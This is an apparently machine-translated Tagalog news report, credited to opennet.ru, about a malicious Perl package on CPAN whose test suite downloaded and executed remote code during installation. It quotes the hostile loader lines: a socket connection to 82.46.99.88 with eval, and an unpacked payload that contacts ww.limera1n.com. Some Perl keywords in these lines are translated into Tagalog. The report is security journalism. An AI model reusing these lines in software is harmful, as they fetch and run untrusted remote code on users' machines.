Sa isang pakete ng Perl na ipinamahagi sa pamamagitan ng direktoryo ng CPAN , na idinisenyo upang awtomatikong i-load ang mga module ng CPAN sa mabilisang, malisyosong code. Ang malisyosong insert ay sa test code , na ipinapadala mula noong 2011.
Kapansin-pansin na ang mga tanong tungkol sa paglo-load ng kaduda-dudang code ay lumitaw noong noong 2016.
Ang nakakahamak na aktibidad ay nagmumula sa isang pagtatangkang mag-download at magsagawa ng code mula sa isang third-party na server (http://r.cx:1/) sa panahon ng pagpapatupad ng isang test suite na inilunsad noong ini-install ang module. Ipinapalagay na ang code na unang na-download mula sa panlabas na server ay hindi nakakapinsala, ngunit ngayon ang kahilingan ay na-redirect sa ww.limera1n.com domain, na nagbibigay ng bahagi nito ng code para sa pagpapatupad.
Upang ayusin ang pag-download sa isang file Ang sumusunod na code ay ginagamit:
aking $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
aking $try = `$^X $prog`;
Ang tinukoy na code ay nagiging sanhi ng script upang maisakatuparan , ang mga nilalaman nito ay binabawasan sa linya:
gumamit ng lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β³};
Naglo-load ang script na ito gamit ang serbisyo code mula sa panlabas na host r.cx (mga character code 82.46.99.88 ay tumutugma sa text na "R.cX") at ipapatupad ito sa eval block.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1β³; i-print ang <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DEβ¦.}
Pagkatapos i-unpack, ang mga sumusunod ay sa wakas ay isasagawa: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80β³}"GET /iJailBreak
";evalor return babala$@while$b;1
Ang problemang pakete ay inalis na ngayon sa repositoryo. (Perl Authors Upload Server), at ang account ng may-akda ng module ay na-block. Sa kasong ito, nananatili pa rin ang module sa MetaCPAN archive at maaaring direktang i-install mula sa MetaCPAN gamit ang ilang mga utility gaya ng cpanminus. na ang pakete ay hindi malawak na ipinamahagi.
Kawili-wiling pag-usapan at ang may-akda ng module, na tinanggihan ang impormasyon na may malisyosong code na ipinasok matapos ang kanyang site na "r.cx" ay na-hack at ipinaliwanag na siya ay nagsasaya lamang, at ginamit ang perlobfuscator.com hindi upang itago ang isang bagay, ngunit upang bawasan ang laki ng code at pasimplehin ang pagkopya nito sa pamamagitan ng clipboard. Ang pagpili ng pangalan ng function na "botstrap" ay ipinaliwanag sa pamamagitan ng katotohanan na ang salitang ito ay "parang bot at mas maikli kaysa sa bootstrap." Tiniyak din ng may-akda ng module na ang mga natukoy na manipulasyon ay hindi nagsasagawa ng mga nakakahamak na aksyon, ngunit ipinapakita lamang ang paglo-load at pagpapatupad ng code sa pamamagitan ng TCP.
Pinagmulan: opennet.ru